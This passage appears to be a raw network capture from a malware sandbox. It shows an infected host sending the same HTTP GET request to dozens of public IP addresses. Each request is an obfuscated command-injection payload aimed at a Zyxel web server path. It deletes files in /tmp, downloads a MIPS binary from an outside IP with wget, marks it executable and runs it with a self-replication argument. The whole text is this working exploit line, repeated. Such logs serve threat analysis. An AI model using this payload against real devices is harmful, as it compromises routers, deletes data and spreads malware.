                              Mar 31, 2024 08:41:09.568356037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1388192.168.2.1349814161.112.104.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568386078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1389192.168.2.134989279.147.107.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568443060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1390192.168.2.1345414128.122.102.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568492889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1391192.168.2.1359940175.72.115.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568546057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1392192.168.2.136077827.15.190.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568582058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1393192.168.2.134944823.180.5.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568639994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1394192.168.2.1351454139.137.202.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568689108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1395192.168.2.1351760150.57.215.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568742990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1396192.168.2.134472249.172.251.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568787098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1397192.168.2.134978061.66.249.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568851948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1398192.168.2.1347158108.87.72.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568876028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1399192.168.2.1359358130.237.191.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568922997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1400192.168.2.1356752157.105.115.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568958044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1401192.168.2.133464675.49.85.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.568994045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1402192.168.2.1352066155.142.104.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569044113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1403192.168.2.1333676149.127.150.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569106102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1404192.168.2.1336512171.19.46.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569159031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1405192.168.2.1356922118.216.39.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569206953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1406192.168.2.1341476145.24.21.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569269896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1407192.168.2.1346296207.128.126.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569288969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1408192.168.2.1334050220.240.248.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569360971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1409192.168.2.1355080169.201.172.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569396973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1410192.168.2.1341606167.240.120.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569447994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1411192.168.2.134596486.88.152.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569498062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1412192.168.2.135625453.199.66.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569528103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1413192.168.2.1339128222.24.86.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569586039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1414192.168.2.1340154163.109.1.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569619894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1415192.168.2.1359690119.140.20.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569664955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1416192.168.2.1359544156.34.92.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569700003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1417192.168.2.1350424195.122.216.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569758892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1418192.168.2.1346932173.227.133.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569809914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1419192.168.2.134058092.25.208.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569822073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1420192.168.2.134434236.248.252.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569870949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1421192.168.2.1343814125.76.142.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569916010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1422192.168.2.1350594111.232.77.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.569974899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1423192.168.2.133743267.48.24.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570003033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1424192.168.2.136077262.224.145.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570055962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1425192.168.2.134083623.177.116.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570122004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1426192.168.2.135092493.48.75.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570177078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1427192.168.2.1346074109.125.6.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570225000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1428192.168.2.1355370186.234.119.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570280075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1429192.168.2.1340304151.158.99.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570326090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1430192.168.2.1346744131.80.67.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570374012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1431192.168.2.1343860156.155.143.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570427895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1432192.168.2.1344174161.249.45.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570477962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1433192.168.2.1334518133.239.181.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570523024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1434192.168.2.1359730216.128.172.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570580006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1435192.168.2.134595878.202.31.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570662022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1436192.168.2.1336804163.88.253.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570723057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1437192.168.2.1359556205.216.5.25443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570775986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1438192.168.2.133759254.106.178.162443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570825100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1439192.168.2.1350680158.59.104.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570862055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1440192.168.2.1338200195.196.222.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570938110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1441192.168.2.134074089.162.84.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.570997000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1442192.168.2.1335714133.20.91.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571029902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1443192.168.2.1337222199.198.167.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571085930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1444192.168.2.1356358186.12.136.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571150064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1445192.168.2.1355722156.195.227.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571203947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1446192.168.2.1356316153.58.210.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571239948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1447192.168.2.1360318213.222.128.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571320057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1448192.168.2.1356246185.199.240.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571360111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1449192.168.2.1359328200.152.113.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571404934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1450192.168.2.1333484164.75.209.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571470022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1451192.168.2.1351386170.115.154.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571502924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1452192.168.2.134830092.58.63.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571551085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1453192.168.2.1342458132.243.28.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571594000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1454192.168.2.1354578131.73.34.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571655989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1455192.168.2.134139836.200.109.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571712017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1456192.168.2.1358484105.138.205.11443
                              TimestampBytes transferredDirectionData
